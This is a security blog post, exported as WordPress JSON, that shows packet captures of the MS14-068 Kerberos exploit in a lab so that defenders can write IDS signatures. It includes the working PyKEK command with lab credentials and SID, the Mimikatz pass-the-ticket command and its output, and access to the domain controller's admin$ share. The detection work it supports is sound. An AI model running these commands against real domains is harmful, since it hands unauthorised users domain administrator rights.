{"id":763,"date":"2014-12-15T21:09:10","date_gmt":"2014-12-16T02:09:10","guid":{"rendered":"http:\/\/adsecurity.org\/?p=763"},"modified":"2015-12-30T11:53:00","modified_gmt":"2015-12-30T16:53:00","slug":"pykek-kerberos-packets-on-the-wire-aka-how-the-ms14-068-exploit-works","status":"publish","type":"post","link":"https:\/\/adsecurity.org\/?p=763","title":{"rendered":"Detecting MS14-068 Kerberos Exploit Packets on the Wire aka How the PyKEK Exploit Works"},"content":{"rendered":"<h4><span style=\"text-decoration: underline;\">MS14-068 References:<\/span><\/h4>\n<ul>\n<li><a title=\"MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege\" href=\"https:\/\/adsecurity.org\/?p=525\">AD Kerberos Privilege Elevation Vulnerability: The Issue<\/a><\/li>\n<li><a title=\"Kerberos Vulnerability in MS14-068 Explained\" href=\"https:\/\/adsecurity.org\/?p=541\">Detailed Explanation of MS14-068<\/a><\/li>\n<li><a title=\"MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=660\">MS14-068 Exploit POC with the Python Kerberos Exploitation Kit (aka PyKEK)<\/a><\/li>\n<li><a title=\"Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=676\">Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)<\/a><\/li>\n<\/ul>\n<p>This post shows the packet captures I performed using WireShark on the Domain Controllers during stage 1 and stage 2 of the attack.<br \/>\nMicrosoft KB3011780 patches this issue.<\/p>\n<p><span style=\"text-decoration: underline;\">Here are the full packet captures:<\/span><\/p>\n<p>Stage 1 &#8211; Using PyKEK to inject a forged PAC into a valid TGT: <a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADSecurityOrg-MS14068-Exploit-KRBPackets.zip\">ADSecurityOrg-MS14068-Exploit-KRBPackets<\/a><\/p>\n<p>Stage 2 
&#8211; Using Mimikatz to leverage the forged TGT into the user session &amp; connect to the unpatched Domain Controller&#8217;s admin$ share: <a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADSecurityOrg-MS14068-Exploit-KRBPackets-TGTInjection-And-DC-AdminShare-Access.zip\">ADSecurityOrg-MS14068-Exploit-KRBPackets-TGTInjection-And-DC-AdminShare-Access<\/a><\/p>\n<p><em>Note: Using the information posted here, it may be possible to create a Snort signature that can identify active MS14-068 exploitation on a network by looking at the TGS-REQ Kerberos packet that states &#8220;include-pac: False&#8221; (additionally, the AS-REQ packet earlier in the conversation also states &#8220;include-pac: False&#8221;).<br \/>\n<\/em><\/p>\n<h3><span style=\"text-decoration: underline;\">Stage 1 Attack Packets: PyKEK requests and modifies a TGT<\/span><\/h3>\n<blockquote><p>The Python script performs a TGT request (Kerberos Authentication Service Request aka AS-REQ) and instead of requesting a TGT with a PAC (default AS-REQ), PyKEK requests a TGT with no PAC from the Domain Controller.<\/p>\n<p>Once the script receives the valid TGT without a PAC from the DC, the script generates a PAC (with the group membership listed above) and packages it in encrypted authorization data as part of a TGS request to the DC (Kerberos Ticket Granting Service Request aka TGS-REQ) to obtain another TGT (a new one with the PyKEK generated PAC).<br \/>\n&#8220;The vulnerable KDC will verify it with MD5 and give you another TGT with a PAC in it&#8221;.<br \/>\nThis is the TGT that PyKEK saves to the ccache file used for stage 2.<\/p>\n<p>Since PyKEK communicates with the Domain Controller for valid TGTs, the TGT is a valid ticket (other than the forged PAC it includes). 
To summarize, there are two TGTs involved in the process: the original one without a PAC as a result of the first AS-REQ and a second one the DC delivers in the TGS-REP with the PyKEK generated PAC.<\/p>\n<p><em>NOTE: The TGT is technically not modified by PyKEK since it is encrypted by the KDC account (KRBTGT). The process the script uses results in a valid TGT with the PAC PyKEK created that is accepted by an unpatched DC. The genius part of this is that PyKEK uses the Kerberos AS &amp; TGS exchanges to forge a PAC and have the DC place it into a new user TGT. Then when the TGT is presented later on in Stage 2 for a valid TGS, the PAC is accepted and its values carried on into the new TGS for a Kerberos service in AD.<\/em><\/p><\/blockquote>\n<p><em>From the post entitled &#8220;<a title=\"Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)\" href=\"https:\/\/adsecurity.org\/?p=676\">Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK)<\/a>&#8220;<strong><br \/>\n<\/strong><\/em><\/p>\n<p><strong><em>c:\\Temp\\pykek&gt; ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! 
-s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org<\/em><\/strong><\/p>\n<p><em>[+] Building AS-REQ for adsdc02.lab.adsecurity.org\u2026 Done!<\/em><br \/>\n<em> [+] Sending AS-REQ to adsdc02.lab.adsecurity.org\u2026 Done!<\/em><\/p>\n<p><strong>Stage 1 Packet #1: TGT request (AS-REQ) with no PAC.<\/strong><\/p>\n<p><!--more--><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREQ-Packet11.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-775\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREQ-Packet11.png\" alt=\"ADS-PyKEK-Exploit-Stage1-KRB5-ASREQ-Packet1\" width=\"827\" height=\"943\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREQ-Packet11.png 827w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREQ-Packet11-263x300.png 263w\" sizes=\"auto, (max-width: 827px) 100vw, 827px\" \/><\/a><\/p>\n<p><strong>NOTE: The AS-REQ for the TGT requests a TGT with no PAC. 
<em>This may be useful for creating a Snort signature to detect attempted MS14-068 exploitation on the network.<\/em><br \/>\n<\/strong>Compare this with a TGT request (AS-REQ) from a Windows client (Windows 7) which requests a PAC by default (click thumbnail to embiggen):<strong><br \/>\n<a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-ASREQ-Packet1.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-thumbnail wp-image-792\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-ASREQ-Packet1-150x150.png\" alt=\"ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-ASREQ-Packet1\" width=\"150\" height=\"150\" \/><\/a><br \/>\n<\/strong><\/p>\n<p><em>[+] Receiving AS-REP from adsdc02.lab.adsecurity.org\u2026 Done!<\/em><\/p>\n<p><strong>Stage 1 Packet #2: TGT Response (AS-REP) which returns the KDC encrypted TGT to the client.<br \/>\n<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREP-Packet2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-773\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREP-Packet2.png\" alt=\"ADS-PyKEK-Exploit-Stage1-KRB5-ASREP-Packet2\" width=\"853\" height=\"565\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREP-Packet2.png 853w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-ASREP-Packet2-300x198.png 300w\" sizes=\"auto, (max-width: 853px) 100vw, 853px\" \/><\/a><\/p>\n<p><em>[+] Parsing AS-REP from adsdc02.lab.adsecurity.org\u2026 Done!<\/em><br \/>\n<em> [+] Building TGS-REQ for adsdc02.lab.adsecurity.org\u2026 Done!<\/em><br \/>\n<em> [+] Sending TGS-REQ to adsdc02.lab.adsecurity.org\u2026 
Done!<\/em><\/p>\n<p><strong>Stage 1 Packet #3: The TGS request notes no PAC should be included and there is an authenticator provided (the generated PAC).<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-TGSREQ-Packet3.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-774\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-TGSREQ-Packet3.png\" alt=\"ADS-PyKEK-Exploit-Stage1-KRB5-TGSREQ-Packet3\" width=\"836\" height=\"965\" \/><\/a><\/p>\n<p><strong>NOTE: The TGS-REQ provides the PAC as part of the request (though no PAC is requested). <em>This can be used to create an IDS signature to detect attempted MS14-068 exploitation on the network.<\/em><br \/>\n<\/strong>Compare this with a TGS request (TGS-REQ) from a Windows client (Windows 7) which doesn&#8217;t have &#8220;include-pac:False&#8221;<br \/>\n(click thumbnail to embiggen):<strong><br \/>\n<a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-TGSREQ-Packet2.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-thumbnail wp-image-804\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-TGSREQ-Packet2-150x150.png\" alt=\"ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-TGSREQ-Packet2\" width=\"150\" height=\"150\" \/><\/a><br \/>\n<\/strong><\/p>\n<p><em>[+] Receiving TGS-REP from adsdc02.lab.adsecurity.org\u2026 Done!<\/em><\/p>\n<p><strong>Stage 1 Packet #4: The TGS response includes the new TGT which uses MD5 (unkeyed).<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-TGSREP-Packet41.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-808 size-full\" 
src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-TGSREP-Packet41.png\" alt=\"\" width=\"863\" height=\"555\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-TGSREP-Packet41.png 863w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage1-KRB5-TGSREP-Packet41-300x192.png 300w\" sizes=\"auto, (max-width: 863px) 100vw, 863px\" \/><\/a><\/p>\n<p><strong>Compare this with a TGS response (TGS-REP) from a Windows client (Windows 7) in which the ticket component contains an &#8220;enc-part&#8221; with the etype: &#8220;eTYPE-AES256-CTS-HMAC-SHA1-96 (18)&#8221; which is a keyed SHA1 hash.<\/strong><br \/>\n(click thumbnail to embiggen):<strong><br \/>\n<\/strong>\u00a0<a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-TGSREP-Packet3.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-thumbnail wp-image-806\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-TGSREP-Packet3-150x150.png\" alt=\"ADS-Standard-Kerberos-UserAuthenticationTraffic-Win7-to-Win2008R2-TGSREP-Packet3\" width=\"150\" height=\"150\" \/><\/a><\/p>\n<p><em>[+] Parsing TGS-REP from adsdc02.lab.adsecurity.org\u2026 Done!<\/em><br \/>\n<em> [+] Creating ccache file \u2018TGT_darthsidious@lab.adsecurity.org.ccache\u2019\u2026 Done!<\/em><\/p>\n<h5><strong>Stage 1 is now complete with a forged TGT.<br \/>\n<\/strong><\/h5>\n<p>&nbsp;<\/p>\n<h3><span style=\"text-decoration: underline;\">Stage 2 Attack Packets: Using Mimikatz to leverage the forged TGT &amp; connect to DC Admin$ Share:<br \/>\n<\/span><\/h3>\n<p>This stage leverages Mimikatz to clear the existing Kerberos tickets in memory for the current user and places the TGT created in Stage 1 into memory for use.<br \/>\nAt this point, the user can connect to the 
unpatched DC with full admin credentials. The act of attempting to connect to the Admin$ share on the DC generates a TGS-REQ and resulting TGS-REP (with a KRB-ERR mixed in for spice).<\/p>\n<p><em><strong>\u00a0c:\\Temp\\pykek&gt; c:\\temp\\mimikatz\\mimikatz.exe \u201ckerberos::ptc c:\\temp\\TGT_darthsidious@lab.adsecurity.org.ccache\u201d exit<\/strong><\/em><\/p>\n<p>.#####.\u00a0\u00a0 mimikatz 2.0 alpha (x64) release \u201cKiwi en C\u201d (Nov 20 2014 01:35:45)<br \/>\n.## ^ ##.<br \/>\n## \/ \\ ##\u00a0 \/* * *<br \/>\n## \\ \/ ##\u00a0\u00a0 Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )<br \/>\n\u2018## v ##\u2019\u00a0\u00a0 http:\/\/blog.gentilkiwi.com\/mimikatz\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 (oe.eo)<br \/>\n\u2018#####\u2019\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 with 15 modules * * *\/<\/p>\n<p>mimikatz(commandline) # kerberos::ptc c:\\temp\\TGT_darthsidious@lab.adsecurity.org.ccache<br \/>\nPrincipal : (01) : darthsidious ; @ LAB.ADSECURITY.ORG<br \/>\nData 0<br \/>\nStart\/End\/MaxRenew: 12\/7\/2014 3:10:30 PM ; 12\/8\/2014 1:10:30 AM ; 12\/14\/2014 3:10:30 PM<br \/>\nService Name (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG<br \/>\nTarget Name\u00a0 (01) : krbtgt ; LAB.ADSECURITY.ORG ; @ LAB.ADSECURITY.ORG<br \/>\nClient Name\u00a0 (01) : darthsidious ; @ LAB.ADSECURITY.ORG<br \/>\nFlags 50a00000\u00a0\u00a0\u00a0 : pre_authent ; renewable ; proxiable ; forwardable ;<br \/>\nSession Key\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 0x00000017 \u2013 rc4_hmac_nt<br \/>\naf5e7b47316c4cebae0a7ead04059799<br \/>\nTicket\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 : 0x00000000 \u2013 null\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ; kvno = 
2\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 [\u2026]<br \/>\n* Injecting ticket : OK<\/p>\n<p>mimikatz(commandline) # exit<br \/>\nBye!<\/p>\n<p><strong><em> c:\\Temp\\pykek&gt; net use \\\\adsdc02.lab.adsecurity.org\\admin$<\/em><br \/>\n<\/strong><\/p>\n<p><strong>Stage 2 Packet #1: The first TGS-REQ for the Admin$ share on the DC using the forged TGT.<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet13.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-768\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet13.png\" alt=\"ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet13\" width=\"766\" height=\"964\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet13.png 766w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet13-238x300.png 238w\" sizes=\"auto, (max-width: 766px) 100vw, 766px\" \/><\/a><\/p>\n<p><strong>Stage 2 Packet #2: Kerberos error response &#8220;eRR-ETYPE-NOSUPP (14)&#8221;, returned because the request included encryption type (etype) eTYPE-AES256-CTS-HMAC-SHA1-96 (18). 
This is interesting since the TGS-REP shows this etype is indeed supported.<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-KRBERR-Packet14.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-769\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-KRBERR-Packet14.png\" alt=\"ADS-PyKEK-Exploit-Stage2-KRB5-KRBERR-Packet14\" width=\"861\" height=\"356\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-KRBERR-Packet14.png 861w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-KRBERR-Packet14-300x124.png 300w\" sizes=\"auto, (max-width: 861px) 100vw, 861px\" \/><\/a><\/p>\n<p><strong>Stage 2 Packet #3<\/strong>: <strong>The second TGS-REQ for the Admin$ share on the DC.<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet15.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-770\" src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet15.png\" alt=\"ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet15\" width=\"759\" height=\"964\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet15.png 759w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREQ-Packet15-236x300.png 236w\" sizes=\"auto, (max-width: 759px) 100vw, 759px\" \/><\/a><\/p>\n<p><strong>Stage 2 Packet #4: The TGS-REP to the second\u00a0 TGS-REQ for the Admin$ share on the DC.<\/strong><\/p>\n<p><a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREP-Packet16.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-771\" 
src=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREP-Packet16.png\" alt=\"ADS-PyKEK-Exploit-Stage2-KRB5-TGSREP-Packet16\" width=\"860\" height=\"541\" srcset=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREP-Packet16.png 860w, https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/ADS-PyKEK-Exploit-Stage2-KRB5-TGSREP-Packet16-300x188.png 300w\" sizes=\"auto, (max-width: 860px) 100vw, 860px\" \/><\/a><\/p>\n<p>From here, the user has a valid TGS for the CIFS service on the DC and can use it to access the admin$ share via SMB.<\/p>\n<h3>References:<\/h3>\n<ul>\n<li><a href=\"http:\/\/msdn.microsoft.com\/en-us\/library\/cc237917.aspx\">Microsoft Kerberos Privileged Attribute Certificate (PAC) Specification<\/a><\/li>\n<li><a href=\"http:\/\/msdn.microsoft.com\/en-us\/library\/cc246080.aspx\">Microsoft Kerberos Overview<\/a><\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>MS14-068 References: AD Kerberos Privilege Elevation Vulnerability: The Issue Detailed Explanation of MS14-068 MS14-068 Exploit POC with the Python Kerberos Exploitation Kit (aka PyKEK) Exploiting MS14-068 Vulnerable Domain Controllers Successfully with the Python Kerberos Exploitation Kit (PyKEK) This post shows the packet captures I performed using WireShark on the Domain Controllers during stage 1 and &hellip; <\/p>\n<p><a class=\"more-link btn\" href=\"https:\/\/adsecurity.org\/?p=763\">Continue 
reading<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,2],"tags":[20,380,101,59,337,80,81,331,298,340,207,295,334,333,341,697,332,22,329,339,330,342],"class_list":["post-763","post","type-post","status-publish","format-standard","hentry","category-microsoft-security","category-technical-reference","tag-activedirectory","tag-cve-2014-6324poc","tag-domaincontroller","tag-kalilinux","tag-kb3011780","tag-kdc","tag-kerberos","tag-kerberoschecksumvulnerability","tag-kerberoshacking","tag-kerberospacketcapture","tag-mimikatz","tag-ms14068","tag-ms14068exploit","tag-ms14068exploitcode","tag-ms14068exploitpacketcapture","tag-pac","tag-poc","tag-powershellcode","tag-pykek","tag-pykekpackets","tag-pythonkerberosexploitationkit","tag-wireshark","item-wrap"],"_links":{"self":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/763","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=763"}],"version-history":[{"count":22,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/763\/revisions"}],"predecessor-version":[{"id":2343,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/763\/revisions\/2343"}],"wp:attachment":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=763"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=763"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ad
security.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=763"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}